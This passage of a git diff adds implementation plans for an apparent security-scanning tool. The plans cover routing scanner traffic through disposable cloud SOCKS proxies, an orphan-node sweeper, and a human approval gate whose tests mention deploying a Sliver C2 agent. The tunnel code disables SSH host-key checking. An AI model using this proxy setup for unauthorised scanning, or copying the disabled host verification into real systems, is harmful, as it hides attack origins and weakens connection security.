ssh_key="k", + local_socks_port=10800, scan_id="s1", + _skip_tunnel=True, + ): + raise ValueError("deliberate") + + assert len(provider.destroyed_ids) == 1 + + @pytest.mark.asyncio + async def test_create_failure_no_destroy(self): + """If creation fails, no destroy is attempted (nothing to destroy).""" + provider = FakeProvider(fail_create=True) + + with pytest.raises(ProvisioningError): + async with ephemeral_proxy( + provider=provider, region="nyc3", ssh_key="k", + local_socks_port=10800, scan_id="s1", + _skip_tunnel=True, + ): + pass # pragma: no cover + + assert provider.destroyed_ids == [] +``` + +- [ ] **Step 2: Run tests to verify they fail** + +Run: `cd packages/cli && python -m pytest tests/test_scanner/test_infra_proxy.py::TestProxyEndpoint -v` +Expected: FAIL with `ModuleNotFoundError` + +- [ ] **Step 3: Implement ephemeral_proxy, ProxyEndpoint, _shielded_destroy** + +```python +# packages/cli/src/opentools/scanner/infra/proxy.py +"""Ephemeral proxy context manager with guaranteed teardown. + +Usage:: + + async with ephemeral_proxy(provider, region="nyc3", ...) as endpoint: + result = await run_streaming(args, on_output, env=endpoint.env) + # Node is destroyed here, guaranteed. 
+""" + +from __future__ import annotations + +import asyncio +import logging +import os +from contextlib import asynccontextmanager +from typing import AsyncIterator + +from opentools.scanner.infra.provider import CloudNodeProvider, ProvisioningError + +logger = logging.getLogger(__name__) + +PROXY_TAG = "opentools-ephemeral-proxy" + + +class ProxyEndpoint: + """The usable result of a provisioned proxy — env vars for subprocess injection.""" + + def __init__(self, host: str, socks_port: int) -> None: + self.host = host + self.socks_port = socks_port + + @property + def env(self) -> dict[str, str]: + """Environment dict with proxy vars merged into parent env.""" + proxy_url = f"socks5://127.0.0.1:{self.socks_port}" + return { + **os.environ, + "HTTP_PROXY": proxy_url, + "HTTPS_PROXY": proxy_url, + "http_proxy": proxy_url, + "https_proxy": proxy_url, + "ALL_PROXY": proxy_url, + } + + +@asynccontextmanager +async def ephemeral_proxy( + provider: CloudNodeProvider, + region: str = "nyc3", + ssh_key: str = "", + ssh_key_path: str = "~/.ssh/id_ed25519", + local_socks_port: int = 10800, + scan_id: str = "", + _skip_tunnel: bool = False, +) -> AsyncIterator[ProxyEndpoint]: + """Provision ephemeral proxy, optionally establish tunnel, yield endpoint. + + GUARANTEE: The cloud node is destroyed on exit regardless of how the + body terminates — normal return, exception, timeout, or cancellation. + The destroy call is shielded from asyncio.CancelledError. + + Args: + _skip_tunnel: If True, skip SSH tunnel setup (for unit testing). 
+ """ + tags = [PROXY_TAG, f"scan:{scan_id}"] + provider_id: str | None = None + tunnel_proc: asyncio.subprocess.Process | None = None + + try: + # Phase 1: Provision + provider_id = await provider.create_node( + region=region, ssh_public_key=ssh_key, tags=tags, + ) + logger.info("Provisioning node %s in %s", provider_id, region) + + ip_address = await provider.wait_until_ready(provider_id) + + # Phase 2: SSH tunnel (skippable for testing) + if not _skip_tunnel: + tunnel_proc = await _establish_tunnel( + ip_address=ip_address, + ssh_key_path=ssh_key_path, + local_port=local_socks_port, + ) + + endpoint = ProxyEndpoint(host=ip_address, socks_port=local_socks_port) + logger.info( + "Proxy ready: 127.0.0.1:%d → %s (node %s)", + local_socks_port, ip_address, provider_id, + ) + + yield endpoint + + finally: + # Phase 3: Teardown (reverse order) + + # 3a. Kill SSH tunnel + if tunnel_proc is not None and tunnel_proc.returncode is None: + tunnel_proc.terminate() + try: + await asyncio.wait_for(tunnel_proc.wait(), timeout=5.0) + except asyncio.TimeoutError: + tunnel_proc.kill() + await tunnel_proc.wait() + logger.info("SSH tunnel terminated") + + # 3b. Destroy cloud node (shielded from cancellation) + if provider_id is not None: + await _shielded_destroy(provider, provider_id) + + +async def _shielded_destroy(provider: CloudNodeProvider, provider_id: str) -> None: + """Destroy a cloud node, shielded from asyncio.CancelledError. + + Pattern: create a concrete Task, shield it, and if CancelledError fires + in our scope, await the task directly (it's still running unaffected). 
+ """ + destroy_task = asyncio.ensure_future(provider.destroy_node(provider_id)) + try: + await asyncio.shield(destroy_task) + logger.info("Node %s destroyed", provider_id) + except asyncio.CancelledError: + try: + await destroy_task + logger.info("Node %s destroyed (post-cancellation)", provider_id) + except Exception: + logger.exception("Failed to destroy node %s during cancellation", provider_id) + raise + except Exception: + logger.exception("Failed to destroy node %s", provider_id) + + +async def _establish_tunnel( + ip_address: str, + ssh_key_path: str, + local_port: int, + max_retries: int = 5, + retry_delay: float = 3.0, +) -> asyncio.subprocess.Process: + """Start SSH dynamic SOCKS5 tunnel with retry for sshd startup race.""" + expanded_key = os.path.expanduser(ssh_key_path) + + for attempt in range(max_retries): + proc = await asyncio.create_subprocess_exec( + "ssh", + "-D", str(local_port), + "-N", + "-o", "StrictHostKeyChecking=no", + "-o", "UserKnownHostsFile=/dev/null", + "-o", "ConnectTimeout=10", + "-o", "ServerAliveInterval=15", + "-o", "ServerAliveCountMax=3", + "-o", "ExitOnForwardFailure=yes", + "-i", expanded_key, + f"root@{ip_address}", + stdout=asyncio.subprocess.PIPE, + stderr=asyncio.subprocess.PIPE, + ) + await asyncio.sleep(2.0) + if proc.returncode is None: + return proc + + stderr = b"" + if proc.stderr: + stderr = await proc.stderr.read() + if attempt < max_retries - 1: + logger.debug( + "SSH attempt %d failed: %s — retrying", + attempt + 1, stderr.decode(errors="replace").strip(), + ) + await asyncio.sleep(retry_delay) + continue + + raise ProvisioningError( + f"SSH tunnel failed after {max_retries} attempts: {stderr.decode(errors='replace')}" + ) + + raise ProvisioningError("SSH tunnel failed: exhausted retries") +``` + +- [ ] **Step 4: Run tests to verify they pass** + +Run: `cd packages/cli && python -m pytest tests/test_scanner/test_infra_proxy.py -v` +Expected: All PASS + +- [ ] **Step 5: Commit** + +```bash +git add 
packages/cli/src/opentools/scanner/infra/proxy.py packages/cli/tests/test_scanner/test_infra_proxy.py +git commit -m "feat(infra): ephemeral_proxy context manager with shielded teardown" +``` + +--- + +### Task 8: ProxiedShellExecutor + +**Files:** +- Create: `packages/cli/src/opentools/scanner/executor/proxied_shell.py` +- Modify: `packages/cli/src/opentools/scanner/executor/__init__.py` +- Test: `packages/cli/tests/test_scanner/test_executor_proxied_shell.py` + +**Context:** Wraps the existing shell execution path. Tasks opt in to proxying via `task.isolation == TaskIsolation.NETWORK_ISOLATED`. Non-proxied tasks fall through to a plain `run_streaming` call identical to `ShellExecutor`. + +- [ ] **Step 1: Write failing tests** + +```python +# packages/cli/tests/test_scanner/test_executor_proxied_shell.py +"""Tests for ProxiedShellExecutor.""" + +import sys + +import pytest + +from opentools.scanner.cancellation import CancellationToken +from opentools.scanner.executor.base import TaskOutput +from opentools.scanner.executor.proxied_shell import ProxiedShellExecutor +from opentools.scanner.infra.provider import CloudNodeProvider, ProvisioningError +from opentools.scanner.models import ScanTask, TaskIsolation, TaskType + + +class FakeProvider(CloudNodeProvider): + def __init__(self): + self.created = [] + self.destroyed = [] + self._poll_count = 0 + + async def create_node(self, region, ssh_public_key, tags): + self.created.append(region) + return "fake-node" + + async def poll_status(self, provider_id): + self._poll_count += 1 + return "active", "1.2.3.4" + + async def destroy_node(self, provider_id): + self.destroyed.append(provider_id) + + +def _make_task( + task_id: str = "t1", + command: str = f"{sys.executable} -c \"print('hello')\"", + isolation: TaskIsolation = TaskIsolation.NONE, + tool: str = "nuclei", +) -> ScanTask: + return ScanTask( + id=task_id, scan_id="scan-1", name="test", + tool=tool, task_type=TaskType.SHELL, + command=command, 
isolation=isolation, + ) + + +class TestProxiedShellExecutor: + @pytest.mark.asyncio + async def test_non_proxied_task_runs_directly(self): + """Tasks without NETWORK_ISOLATED run as plain subprocess.""" + executor = ProxiedShellExecutor(provider=None) + task = _make_task(isolation=TaskIsolation.NONE) + cancel = CancellationToken() + result = await executor.execute(task, lambda _: None, cancel) + assert result.exit_code == 0 + assert "hello" in result.stdout + + @pytest.mark.asyncio + async def test_no_provider_falls_through(self): + """NETWORK_ISOLATED task with no provider configured runs directly.""" + executor = ProxiedShellExecutor(provider=None) + task = _make_task(isolation=TaskIsolation.NETWORK_ISOLATED) + cancel = CancellationToken() + result = await executor.execute(task, lambda _: None, cancel) + assert result.exit_code == 0 + + @pytest.mark.asyncio + async def test_proxied_task_provisions_and_destroys(self): + """NETWORK_ISOLATED task with provider triggers full lifecycle.""" + provider = FakeProvider() + executor = ProxiedShellExecutor( + provider=provider, ssh_key="k", ssh_key_path="/dev/null", + _skip_tunnel=True, + ) + task = _make_task(isolation=TaskIsolation.NETWORK_ISOLATED) + cancel = CancellationToken() + result = await executor.execute(task, lambda _: None, cancel) + assert result.exit_code == 0 + assert len(provider.created) == 1 + assert len(provider.destroyed) == 1 + + @pytest.mark.asyncio + async def test_missing_command_raises(self): + executor = ProxiedShellExecutor(provider=None) + task = ScanTask( + id="t1", scan_id="s1", name="no-cmd", + tool="test", task_type=TaskType.SHELL, + ) + cancel = CancellationToken() + with pytest.raises(ValueError, match="no command"): + await executor.execute(task, lambda _: None, cancel) + + @pytest.mark.asyncio + async def test_socks_port_increments(self): + """Each proxied task gets a unique SOCKS port.""" + executor = ProxiedShellExecutor( + provider=FakeProvider(), ssh_key="k", + 
base_socks_port=10800, _skip_tunnel=True, + ) + assert executor._next_socks_port() == 10800 + assert executor._next_socks_port() == 10801 +``` + +- [ ] **Step 2: Run tests to verify they fail** + +Run: `cd packages/cli && python -m pytest tests/test_scanner/test_executor_proxied_shell.py::TestProxiedShellExecutor::test_non_proxied_task_runs_directly -v` +Expected: FAIL with `ModuleNotFoundError` + +- [ ] **Step 3: Implement ProxiedShellExecutor** + +```python +# packages/cli/src/opentools/scanner/executor/proxied_shell.py +"""ProxiedShellExecutor — optionally routes tool traffic through ephemeral proxy.""" + +from __future__ import annotations + +import shlex +from typing import Callable + +from opentools.scanner.cancellation import CancellationToken +from opentools.scanner.executor.base import TaskOutput +from opentools.scanner.infra.provider import CloudNodeProvider +from opentools.scanner.infra.proxy import ephemeral_proxy +from opentools.scanner.models import ScanTask, TaskIsolation +from opentools.shared.subprocess import run_streaming + + +class ProxiedShellExecutor: + """Shell executor with optional ephemeral proxy routing. + + Tasks with ``isolation == TaskIsolation.NETWORK_ISOLATED`` are routed + through an ephemeral SOCKS5 proxy. All other tasks run as plain + subprocesses, identical to ShellExecutor. 
+ """ + + def __init__( + self, + provider: CloudNodeProvider | None, + ssh_key: str = "", + ssh_key_path: str = "~/.ssh/id_ed25519", + default_timeout: int = 300, + base_socks_port: int = 10800, + _skip_tunnel: bool = False, + ) -> None: + self._provider = provider + self._ssh_key = ssh_key + self._ssh_key_path = ssh_key_path + self._default_timeout = default_timeout + self._base_socks_port = base_socks_port + self._port_counter = 0 + self._skip_tunnel = _skip_tunnel + + def _next_socks_port(self) -> int: + port = self._base_socks_port + self._port_counter + self._port_counter += 1 + return port + + async def execute( + self, + task: ScanTask, + on_output: Callable[[bytes], None], + cancellation: CancellationToken, + ) -> TaskOutput: + if task.command is None: + raise ValueError(f"Task {task.id} has no command") + + needs_proxy = ( + self._provider is not None + and task.isolation == TaskIsolation.NETWORK_ISOLATED + ) + + if not needs_proxy: + return await self._run_direct(task, on_output, cancellation) + + return await self._run_proxied(task, on_output, cancellation) + + async def _run_direct( + self, task: ScanTask, on_output: Callable[[bytes], None], + cancellation: CancellationToken, + ) -> TaskOutput: + args = shlex.split(task.command) + result = await run_streaming( + args=args, on_output=on_output, + timeout=self._default_timeout, cancellation=cancellation, + ) + return TaskOutput( + exit_code=result.exit_code, stdout=result.stdout, + stderr=result.stderr, duration_ms=result.duration_ms, + ) + + async def _run_proxied( + self, task: ScanTask, on_output: Callable[[bytes], None], + cancellation: CancellationToken, + ) -> TaskOutput: + socks_port = self._next_socks_port() + + async with ephemeral_proxy( + provider=self._provider, + region="nyc3", + ssh_key=self._ssh_key, + ssh_key_path=self._ssh_key_path, + local_socks_port=socks_port, + scan_id=task.scan_id, + _skip_tunnel=self._skip_tunnel, + ) as proxy: + args = shlex.split(task.command) + result = await 
run_streaming( + args=args, on_output=on_output, + timeout=self._default_timeout, cancellation=cancellation, + env=proxy.env, + ) + + return TaskOutput( + exit_code=result.exit_code, stdout=result.stdout, + stderr=result.stderr, duration_ms=result.duration_ms, + ) +``` + +- [ ] **Step 4: Update executor __init__.py exports** + +In `packages/cli/src/opentools/scanner/executor/__init__.py`, add: + +```python +from opentools.scanner.executor.proxied_shell import ProxiedShellExecutor +``` + +And add `"ProxiedShellExecutor"` to the `__all__` list. + +- [ ] **Step 5: Run tests to verify they pass** + +Run: `cd packages/cli && python -m pytest tests/test_scanner/test_executor_proxied_shell.py -v` +Expected: All PASS + +- [ ] **Step 6: Run all executor tests for regression check** + +Run: `cd packages/cli && python -m pytest tests/test_scanner/test_executor_shell.py tests/test_scanner/test_executor_docker.py -v` +Expected: All PASS + +- [ ] **Step 7: Commit** + +```bash +git add packages/cli/src/opentools/scanner/executor/proxied_shell.py packages/cli/src/opentools/scanner/executor/__init__.py packages/cli/tests/test_scanner/test_executor_proxied_shell.py +git commit -m "feat(executor): add ProxiedShellExecutor with ephemeral proxy routing" +``` + +--- + +### Task 9: Orphan Sweeper + Final Integration + +**Files:** +- Create: `packages/cli/src/opentools/scanner/infra/sweeper.py` +- Test: `packages/cli/tests/test_scanner/test_infra_sweeper.py` (inline below) + +- [ ] **Step 1: Write failing tests for sweep_orphaned_nodes** + +```python +# packages/cli/tests/test_scanner/test_infra_sweeper.py +"""Tests for orphan node sweeper.""" + +import pytest + +from opentools.scanner.infra.sweeper import sweep_orphaned_nodes + + +class FakeListableProvider: + """Provider that also supports listing nodes by tag.""" + def __init__(self, orphan_ids: list[str]): + self._orphan_ids = orphan_ids + self.destroyed_ids: list[str] = [] + + async def list_nodes_by_tag(self, tag: str) -> list[str]: 
+ return list(self._orphan_ids) + + async def destroy_node(self, provider_id: str) -> None: + self.destroyed_ids.append(provider_id) + + +class TestSweepOrphanedNodes: + @pytest.mark.asyncio + async def test_destroys_orphans(self): + provider = FakeListableProvider(orphan_ids=["orphan-1", "orphan-2"]) + count = await sweep_orphaned_nodes(provider) + assert count == 2 + assert set(provider.destroyed_ids) == {"orphan-1", "orphan-2"} + + @pytest.mark.asyncio + async def test_no_orphans(self): + provider = FakeListableProvider(orphan_ids=[]) + count = await sweep_orphaned_nodes(provider) + assert count == 0 + assert provider.destroyed_ids == [] + + @pytest.mark.asyncio + async def test_destroy_failure_continues(self): + """One destroy failure should not stop cleanup of remaining nodes.""" + class PartialFailProvider(FakeListableProvider): + async def destroy_node(self, provider_id): + if provider_id == "orphan-1": + raise Exception("API error") + self.destroyed_ids.append(provider_id) + + provider = PartialFailProvider(orphan_ids=["orphan-1", "orphan-2"]) + count = await sweep_orphaned_nodes(provider) + # orphan-2 was destroyed, orphan-1 failed + assert count == 1 + assert "orphan-2" in provider.destroyed_ids +``` + +- [ ] **Step 2: Run tests to verify they fail** + +Run: `cd packages/cli && python -m pytest tests/test_scanner/test_infra_sweeper.py -v` +Expected: FAIL with `ModuleNotFoundError` + +- [ ] **Step 3: Implement sweep_orphaned_nodes** + +```python +# packages/cli/src/opentools/scanner/infra/sweeper.py +"""Startup sweeper for orphaned ephemeral proxy nodes. + +Call sweep_orphaned_nodes() during ScanEngine initialization to clean +up nodes from crashed previous runs. Uses the PROXY_TAG to identify +resources that belong to OpenTools. 
+""" + +from __future__ import annotations + +import logging + +from opentools.scanner.infra.proxy import PROXY_TAG + +logger = logging.getLogger(__name__) + + +async def sweep_orphaned_nodes(provider: object) -> int: + """Destroy any nodes tagged with PROXY_TAG from previous runs. + + The provider must implement ``list_nodes_by_tag(tag) -> list[str]`` + and ``destroy_node(provider_id)``. + + Returns the number of nodes successfully destroyed. + """ + if not hasattr(provider, "list_nodes_by_tag"): + logger.debug("Provider does not support list_nodes_by_tag, skipping sweep") + return 0 + + orphan_ids = await provider.list_nodes_by_tag(PROXY_TAG) + if not orphan_ids: + return 0 + + logger.info("Found %d orphaned proxy nodes to sweep", len(orphan_ids)) + destroyed = 0 + + for node_id in orphan_ids: + try: + await provider.destroy_node(node_id) + destroyed += 1 + logger.info("Destroyed orphaned node %s", node_id) + except Exception: + logger.exception("Failed to destroy orphaned node %s", node_id) + + return destroyed +``` + +- [ ] **Step 4: Run tests to verify they pass** + +Run: `cd packages/cli && python -m pytest tests/test_scanner/test_infra_sweeper.py -v` +Expected: All PASS + +- [ ] **Step 5: Run the full test suite for both phases** + +Run: `cd packages/cli && python -m pytest tests/test_scanner/test_mutation_models.py tests/test_scanner/test_mutation_analyzer.py tests/test_scanner/test_mutation_strategy.py tests/test_scanner/test_engine_mutation.py tests/test_scanner/test_engine.py tests/test_scanner/test_shared_subprocess.py tests/test_scanner/test_infra_provider.py tests/test_scanner/test_infra_proxy.py tests/test_scanner/test_executor_proxied_shell.py tests/test_scanner/test_infra_sweeper.py -v` +Expected: All PASS + +- [ ] **Step 6: Commit** + +```bash +git add packages/cli/src/opentools/scanner/infra/sweeper.py packages/cli/tests/test_scanner/test_infra_sweeper.py +git commit -m "feat(infra): add orphan node sweeper for startup cleanup" +``` + +--- + +## 
Appendix: Concurrency Safety Proof + +The mutation layer introduces zero new concurrency hazards. Here is the execution trace through a single event loop turn: + +``` +await asyncio.wait(in_flight, FIRST_COMPLETED) # ← yield point +│ +├─ for completed_future in done: # synchronous +│ ├─ _mark_completed(task_id, output) # synchronous +│ │ ├─ analyzer.analyze(stdout, stderr) # synchronous (XML/JSON parse) +│ │ ├─ kill_chain.ingest(bundle) # synchronous (dict mutation) +│ │ ├─ strategy.evaluate(state, scan_id, task) # synchronous +│ │ ├─ _evaluate_edges(task, output) # synchronous (existing) +│ │ └─ _inject_tasks(new_tasks) # synchronous (dict mutation) +│ └─ (next completed_future) +│ +├─ ready_tasks_by_priority() # sees injected tasks +├─ dispatch → asyncio.ensure_future(...) # schedules, no yield +└─ await asyncio.wait(...) # ← next yield point +``` + +No `await` between state mutation and the next readiness check. The asyncio event loop cannot context-switch during this chain. diff --git a/docs/superpowers/plans/2026-04-13-hitl-approval-gate-vultr-provider.md b/docs/superpowers/plans/2026-04-13-hitl-approval-gate-vultr-provider.md new file mode 100644 index 0000000..fe7664c --- /dev/null +++ b/docs/superpowers/plans/2026-04-13-hitl-approval-gate-vultr-provider.md @@ -0,0 +1,1384 @@ +# HITL Approval Gate + Vultr Provider Implementation Plan + +> **For agentic workers:** REQUIRED SUB-SKILL: Use superpowers:subagent-driven-development (recommended) or superpowers:executing-plans to implement this plan task-by-task. Steps use checkbox (`- [ ]`) syntax for tracking. + +**Goal:** Add a durable Human-In-The-Loop approval gate to the DAG execution engine and a Vultr cloud provider for ephemeral proxy routing. + +**Architecture:** The approval gate is an execution wrapper — not a separate TaskType — that inserts a sleep-until-approved phase into `_execute_task` before the real executor fires. 
Persistence is SQLite-first: the FastAPI route writes decisions to the database before signaling the in-memory `asyncio.Event`. The Vultr provider implements the existing `CloudNodeProvider` ABC with explicit SSH key injection for automated tunnel bootstrapping. + +**Tech Stack:** Python 3.12+, Pydantic v2, asyncio, httpx, aiosqlite, FastAPI, pytest + pytest-asyncio + +**Spec:** [2026-04-13-hitl-approval-gate-vultr-provider-design.md](../specs/2026-04-13-hitl-approval-gate-vultr-provider-design.md) + +**Depends on:** [2026-04-13-dag-mutation-ephemeral-proxy.md](2026-04-13-dag-mutation-ephemeral-proxy.md) (Phase A Tasks 1-4 and Phase B Task 6) + +--- + +## File Structure + +### Phase C — HITL Approval Gate + +| Action | Path | Responsibility | +|--------|------|----------------| +| Modify | `packages/cli/src/opentools/scanner/models.py:54-60,201-231` | Add `AWAITING_APPROVAL` to `TaskStatus`, `ApprovalRequirement` model, new fields on `ScanTask` | +| Create | `packages/cli/src/opentools/scanner/approval.py` | `ApprovalRegistry` singleton | +| Modify | `packages/cli/src/opentools/scanner/engine.py:215-251` | Insert gate phase into `_execute_task` | +| Modify | `packages/web/backend/app/models.py:252-284` | Add approval columns to `ScanTaskRecord` | +| Modify | `packages/web/backend/app/routes/scans.py` | Add gate list/approve/reject endpoints | +| Create | `packages/cli/tests/test_scanner/test_approval_registry.py` | Tests for ApprovalRegistry | +| Create | `packages/cli/tests/test_scanner/test_engine_approval.py` | Integration tests for gate in engine | +| Create | `packages/web/backend/tests/test_gate_routes.py` | Tests for FastAPI gate endpoints | + +### Task 6b — Vultr Provider + +| Action | Path | Responsibility | +|--------|------|----------------| +| Create | `packages/cli/src/opentools/scanner/infra/vultr.py` | `VultrProvider` implementation | +| Create | `packages/cli/tests/test_scanner/test_infra_vultr.py` | Tests with httpx MockTransport | + +--- + +## 
Phase C: HITL Approval Gate + +### Task 10: Model Additions — ApprovalRequirement, TaskStatus, ScanTask Fields + +**Files:** +- Modify: `packages/cli/src/opentools/scanner/models.py:54-60` (TaskStatus enum) +- Modify: `packages/cli/src/opentools/scanner/models.py:188-231` (new model + ScanTask fields) +- Test: `packages/cli/tests/test_scanner/test_mutation_models.py` (append) + +- [ ] **Step 1: Write failing tests for ApprovalRequirement and new ScanTask fields** + +```python +# Append to packages/cli/tests/test_scanner/test_mutation_models.py +# OR create packages/cli/tests/test_scanner/test_approval_models.py + +from opentools.scanner.models import ( + ApprovalRequirement, + ScanTask, + TaskStatus, + TaskType, +) + + +class TestApprovalRequirement: + def test_defaults(self): + req = ApprovalRequirement() + assert req.timeout_seconds == 3600 + assert req.description == "" + + def test_custom_values(self): + req = ApprovalRequirement( + timeout_seconds=600, + description="Deploy Sliver agent on 10.0.0.1", + ) + assert req.timeout_seconds == 600 + assert req.description == "Deploy Sliver agent on 10.0.0.1" + + +class TestTaskStatusApproval: + def test_awaiting_approval_value(self): + assert TaskStatus.AWAITING_APPROVAL == "awaiting_approval" + + def test_awaiting_approval_in_enum(self): + assert "awaiting_approval" in [s.value for s in TaskStatus] + + +class TestScanTaskApprovalFields: + def test_requires_approval_default_none(self): + task = ScanTask( + id="t1", scan_id="s1", name="test", + tool="nmap", task_type=TaskType.SHELL, + ) + assert task.requires_approval is None + assert task.approval_ticket_id is None + assert task.approval_expires_at is None + + def test_requires_approval_set(self): + req = ApprovalRequirement( + timeout_seconds=1800, + description="Dangerous action", + ) + task = ScanTask( + id="t1", scan_id="s1", name="test", + tool="c2", task_type=TaskType.SHELL, + requires_approval=req, + ) + assert task.requires_approval.timeout_seconds == 1800 + 
assert task.requires_approval.description == "Dangerous action" + + def test_approval_ticket_fields(self): + from datetime import datetime, timezone + task = ScanTask( + id="t1", scan_id="s1", name="test", + tool="nmap", task_type=TaskType.SHELL, + approval_ticket_id="gate-t1-abc123", + approval_expires_at=datetime(2026, 4, 13, 15, 0, 0, tzinfo=timezone.utc), + ) + assert task.approval_ticket_id == "gate-t1-abc123" + assert task.approval_expires_at.year == 2026 +``` + +- [ ] **Step 2: Run tests to verify they fail** + +Run: `cd packages/cli && python -m pytest tests/test_scanner/test_approval_models.py::TestApprovalRequirement::test_defaults -v` +Expected: FAIL with `ImportError: cannot import name 'ApprovalRequirement'` + +- [ ] **Step 3: Implement model additions** + +In `packages/cli/src/opentools/scanner/models.py`, add `AWAITING_APPROVAL` to `TaskStatus` (after line 60): + +```python +class TaskStatus(StrEnum): + PENDING = "pending" + BLOCKED = "blocked" + RUNNING = "running" + COMPLETED = "completed" + FAILED = "failed" + SKIPPED = "skipped" + AWAITING_APPROVAL = "awaiting_approval" +``` + +Add `ApprovalRequirement` model before `ReactiveEdge` (before line 188): + +```python +class ApprovalRequirement(BaseModel): + """Gate metadata for tasks requiring operator approval before execution.""" + timeout_seconds: int = 3600 + description: str = "" +``` + +Add new fields to `ScanTask` (after line 231, before the closing of the class): + +```python +class ScanTask(BaseModel): + # ... existing fields through completed_at ... 
+ requires_approval: Optional[ApprovalRequirement] = None + approval_ticket_id: Optional[str] = None + approval_expires_at: Optional[datetime] = None +``` + +- [ ] **Step 4: Run tests to verify they pass** + +Run: `cd packages/cli && python -m pytest tests/test_scanner/test_approval_models.py -v` +Expected: All PASS + +- [ ] **Step 5: Run existing model tests for regression check** + +Run: `cd packages/cli && python -m pytest tests/test_scanner/test_models.py tests/test_scanner/test_engine.py -v` +Expected: All PASS + +- [ ] **Step 6: Commit** + +```bash +git add packages/cli/src/opentools/scanner/models.py packages/cli/tests/test_scanner/test_approval_models.py +git commit -m "feat(models): add ApprovalRequirement, AWAITING_APPROVAL status, approval fields on ScanTask" +``` + +--- + +### Task 11: ApprovalRegistry — In-Memory Notification Hub + +**Files:** +- Create: `packages/cli/src/opentools/scanner/approval.py` +- Test: `packages/cli/tests/test_scanner/test_approval_registry.py` + +- [ ] **Step 1: Write failing tests for ApprovalRegistry** + +```python +# packages/cli/tests/test_scanner/test_approval_registry.py +"""Tests for ApprovalRegistry — in-memory notification hub.""" + +import asyncio + +import pytest + +from opentools.scanner.approval import ApprovalRegistry + + +class TestApprovalRegistry: + def test_register_returns_event(self): + registry = ApprovalRegistry() + event = registry.register("ticket-1") + assert isinstance(event, asyncio.Event) + assert not event.is_set() + + def test_signal_sets_event(self): + registry = ApprovalRegistry() + event = registry.register("ticket-1") + result = registry.signal("ticket-1") + assert result is True + assert event.is_set() + + def test_signal_missing_returns_false(self): + registry = ApprovalRegistry() + result = registry.signal("nonexistent") + assert result is False + + def test_remove_cleans_up(self): + registry = ApprovalRegistry() + registry.register("ticket-1") + registry.remove("ticket-1") + assert 
registry.signal("ticket-1") is False + + def test_remove_missing_does_not_raise(self): + registry = ApprovalRegistry() + registry.remove("nonexistent") # should not raise + + def test_has_ticket(self): + registry = ApprovalRegistry() + assert registry.has_ticket("ticket-1") is False + registry.register("ticket-1") + assert registry.has_ticket("ticket-1") is True + + def test_pending_tickets(self): + registry = ApprovalRegistry() + registry.register("ticket-1") + registry.register("ticket-2") + assert registry.pending_ticket_ids() == {"ticket-1", "ticket-2"} + + @pytest.mark.asyncio + async def test_event_wakes_awaiter(self): + """Verify the full async flow: register → await → signal → wake.""" + registry = ApprovalRegistry() + event = registry.register("ticket-1") + woke = False + + async def waiter(): + nonlocal woke + await asyncio.wait_for(event.wait(), timeout=5.0) + woke = True + + task = asyncio.ensure_future(waiter()) + await asyncio.sleep(0.05) + assert not woke + + registry.signal("ticket-1") + await task + assert woke + + @pytest.mark.asyncio + async def test_multiple_gates_independent(self): + """Two gates: signaling one does not wake the other.""" + registry = ApprovalRegistry() + event_a = registry.register("a") + event_b = registry.register("b") + + registry.signal("a") + assert event_a.is_set() + assert not event_b.is_set() +``` + +- [ ] **Step 2: Run tests to verify they fail** + +Run: `cd packages/cli && python -m pytest tests/test_scanner/test_approval_registry.py::TestApprovalRegistry::test_register_returns_event -v` +Expected: FAIL with `ModuleNotFoundError` + +- [ ] **Step 3: Implement ApprovalRegistry** + +```python +# packages/cli/src/opentools/scanner/approval.py +"""ApprovalRegistry — in-memory notification hub for HITL approval gates. + +NOT the source of truth. The database is always authoritative for gate +decisions. This registry only provides asyncio.Event handles so that +FastAPI routes can wake sleeping gate coroutines. 
+ +If a ticket is missing from the registry (e.g., server restarted before +the engine reconstructed it), the route still writes the decision to +SQLite — the executor will pick it up on its next DB read. +""" + +from __future__ import annotations + +import asyncio + + +class ApprovalRegistry: + """In-memory notification hub mapping ticket IDs to asyncio.Events.""" + + def __init__(self) -> None: + self._events: dict[str, asyncio.Event] = {} + + def register(self, ticket_id: str) -> asyncio.Event: + """Create and store an event for a gate ticket. Returns the event.""" + event = asyncio.Event() + self._events[ticket_id] = event + return event + + def signal(self, ticket_id: str) -> bool: + """Signal the event if it exists. Returns False if not in registry.""" + event = self._events.get(ticket_id) + if event is None: + return False + event.set() + return True + + def remove(self, ticket_id: str) -> None: + """Clean up after a gate resolves.""" + self._events.pop(ticket_id, None) + + def has_ticket(self, ticket_id: str) -> bool: + """Check if a ticket is registered.""" + return ticket_id in self._events + + def pending_ticket_ids(self) -> set[str]: + """Return all registered ticket IDs.""" + return set(self._events.keys()) +``` + +- [ ] **Step 4: Run tests to verify they pass** + +Run: `cd packages/cli && python -m pytest tests/test_scanner/test_approval_registry.py -v` +Expected: All PASS + +- [ ] **Step 5: Commit** + +```bash +git add packages/cli/src/opentools/scanner/approval.py packages/cli/tests/test_scanner/test_approval_registry.py +git commit -m "feat(approval): add ApprovalRegistry in-memory notification hub" +``` + +--- + +### Task 12: Engine Integration — Gate Phase in `_execute_task` + +**Files:** +- Modify: `packages/cli/src/opentools/scanner/engine.py:35-69` (`__init__` — add registry + store) +- Modify: `packages/cli/src/opentools/scanner/engine.py:215-251` (`_execute_task` — insert gate phase) +- Test: 
`packages/cli/tests/test_scanner/test_engine_approval.py`
+
+**Context:** The gate phase inserts between the cache check and resource acquisition, so a sleeping gate never holds a real executor slot. A gated task persists `AWAITING_APPROVAL` + `expires_at` to the store, registers an event, sleeps, then reads the decision from the store on wake. The resource pool uses an `approval_gate` group with effectively unlimited slots so sleeping gates don't starve real workers.
+
+- [ ] **Step 1: Write failing integration tests**
+
+```python
+# packages/cli/tests/test_scanner/test_engine_approval.py
+"""Integration tests: ScanEngine + HITL approval gate."""
+
+import asyncio
+from datetime import datetime, timezone
+from typing import Any, Callable
+
+import pytest
+
+from opentools.scanner.approval import ApprovalRegistry
+from opentools.scanner.cancellation import CancellationToken
+from opentools.scanner.engine import ScanEngine
+from opentools.scanner.executor.base import TaskOutput
+from opentools.scanner.models import (
+    ApprovalRequirement,
+    Scan,
+    ScanStatus,
+    ScanTask,
+    TaskStatus,
+    TaskType,
+    TargetType,
+)
+from opentools.shared.progress import EventBus
+from opentools.shared.resource_pool import AdaptiveResourcePool
+
+
+class MockExecutor:
+    def __init__(self, results: dict[str, TaskOutput] | None = None):
+        self._results = results or {}
+        self._default = TaskOutput(exit_code=0, stdout="ok", duration_ms=10)
+        self.executed: list[str] = []
+
+    async def execute(
+        self, task: ScanTask, on_output: Callable[[bytes], None],
+        cancellation: CancellationToken,
